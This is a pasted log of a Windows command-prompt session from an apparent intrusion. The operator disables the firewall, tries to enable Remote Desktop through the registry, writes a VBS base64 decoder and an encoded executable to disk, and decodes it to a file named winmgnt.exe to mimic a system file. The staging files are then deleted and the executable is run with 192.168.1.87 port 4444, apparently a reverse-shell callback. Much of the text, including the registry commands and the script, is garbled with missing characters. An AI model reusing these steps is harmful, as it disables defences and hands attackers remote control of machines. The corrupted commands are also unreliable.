Advertisement
Guest User

asdas

a guest
Jun 15th, 2013
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.47 KB | None | 0 0
  1. C:\Program Files\ICW>cd C:\ C:\>netsh firewall set opmode disable IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 . Ok. C:\>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSonnections /t RG_WOR /d 0 /f ERROR: Invalid syntax. Type "REG ADD /?" for usage. C:\>reg add "HKEY_LOAL_MAHIE\SSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWRD d 1 /f ERROR: Invalid key name. Type "REG ADD /?" for usage. C:\>copy con c:\decoder.vbs Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTSset objFS = CreateObject("Scripting.FileSystemObject"): set objT = objF.OpenTextile(inile, 1)base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64): dim M, ELSet DM = CreateObject("icrosoft.XMLDO"):Set L = DM.createlement("tmp):L.Dataype = "bin.base64:EL.Text base64:decodeBase64 = E.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream: Set binaryStream = CreateObject(ADDB.Stream"):binaryStream.Type = 1:binaryStream.Open:binarytream.Write bytes:binaryStream.SaveToFile file, 2End Sub ^Z 1 file(s) copied. C:\>copy con c:\winmgnt.txt TVprZXJuZWwzMi5kbGwAAFBAAMAIAAAAAAAAAAAA4APAQsBAAAAAgAAAAAAAA AADfQgAEAAAAQAAAAEAAAAAAAAEAAAAAAAAAQAAAAAAAAFAAAAAAAAAA gAAAAAEAEAAAAQAAAQAAAAAAAEAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS 0sMAMAAABAAAAAAAAAAAAAAAAAAAAAAA4AAwLSdduFuvUBAAAAAADvAgAA AIAAAAAAAAAAAAAAAOAAC+HBAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzw8TcyG2 gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/186yas0eh0LxPJ6xqRSMHgCKz/Uw9AH0A AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA WXTseQesPAB1+5FAUFX/U/rdefDAAAAAzyHExPJ/xNy+MOwQgAvUIAAAAAAEA MAFAAAQAAAEAAawGMkAHagoDnw4VzoQgLFTiean446lMelAsnRBP0Bv1ysTNq kIGsnxVmiejeINmxwVke0+mOGe8XVmlD05ZqofmRmfiF9i3MM2QpqaJtoTp6b0gV6kw EVkkBBRFRFxAeGooEGhdK81MHTop5RVWhVY2/bg4KCJiC+FFOgfgvD/yUkILtv KhwQxghFL3DIghxzAFVi+yxHz+/4hV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp AOFYO8F0C19eMLgDucnCCOGGSY29PHlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A VXMRi30Mxhe4An+CohOdaLCgWDQzUN5tH34f5Yo+7nRLsfFqnOEQTeQE81TUhszwE7s hwtw0ooGj08ArMSDvffkOsLLAZjQyJBkiDLQrdfHoBEzUc44jCDxf0avXoaQkZSf+9 gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPBO5//6AvfTI8uB4USAdHzp bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAMwbWQAZj9AABQ4IADd3MyXzOY LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1BXc9hckZ1cBh5aMoscxNPJmNrYu/ /7gDbJUacspebEzHV9NpdPNp7yRR8NMQ29tiGuZDZMaUifoB2cvudOlC3gudzFUFYIcBk SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA AAxAADpdL7//wAAIAAAMQAA cscript c:\decoder.vbs c:\winmgnt.txt c:\winmgnt.exe del c:\decoder.vbs del c:\winmgnt.txt c:\winmgnt.exe 192.168.1.87 4444
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement